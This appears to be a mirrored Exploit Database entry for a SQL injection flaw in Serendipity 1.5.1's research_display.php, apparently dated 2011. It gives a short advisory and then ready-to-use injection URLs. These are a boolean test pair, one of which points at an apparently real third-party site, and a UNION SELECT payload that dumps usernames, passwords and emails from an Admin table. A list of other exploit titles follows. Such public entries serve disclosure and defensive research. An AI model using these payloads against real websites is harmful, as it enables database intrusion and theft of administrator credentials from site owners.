S9Y Serendipity 1.5.1 – ‘research_display.php’ SQL Injection

Exploit Database
112 阅读

作者： The_Exploited

日期： 2011-08-31
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/36095/

source: https://www.securityfocus.com/bid/49395/info

Serendipity is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Serendipity 1.5.1 is vulnerable; other versions may also be affected.

http://www.example.com/research_display.php?ID=47 and 1=1 //\\ http://www.aarda.org/research_display.php?ID=47 and 1=2

http://www.example.com/research_display.php?ID=-null+UNiON+ALL+SELECT+null,null,null,group_concat%28user,0x3a,pass,0x3a,email%29,null,null,null+FROM+Admin

last Exploits
S9Y Serendipity 1.5.1 – ‘research_display.php’ SQL Injection的更多信息

Advanced Page Visit Counter 1.0 – Admin+ Stored Cross-Site Scripting (XSS) (Authenticated)：
VICIDIAL Call Center Suite – Multiple SQL Injections：
Ubiquiti Networks UniFi 3.2.10 – Cross-Site Request Forgery：
LiveCRM SaaS Cloud 1.0 – SQL Injection：
Citrix Application Delivery Controller (ADC) and Gateway 13.0 – Path Traversal：
EgavilanMedia PHPCRUD 1.0 – ‘Full Name’ Stored Cross Site Scripting：
Last Wizardz – ‘id’ SQL Injection：
WordPress Plugin Js-appointment 1.5 – SQL Injection：